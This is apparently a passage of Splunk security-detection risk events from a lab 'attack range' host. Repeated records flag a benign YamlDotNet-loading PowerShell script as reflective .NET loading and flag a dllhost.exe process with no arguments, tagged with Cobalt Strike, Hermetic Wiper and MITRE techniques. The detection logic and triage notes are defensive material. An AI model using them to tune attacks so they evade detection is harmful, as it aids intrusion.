CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664729734, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664722800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664722800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1204", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664722800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664722800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4b4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664726131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T14:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T14:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664726131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T14:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T14:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664726131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T14:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T14:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664726131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T14:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T14:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will 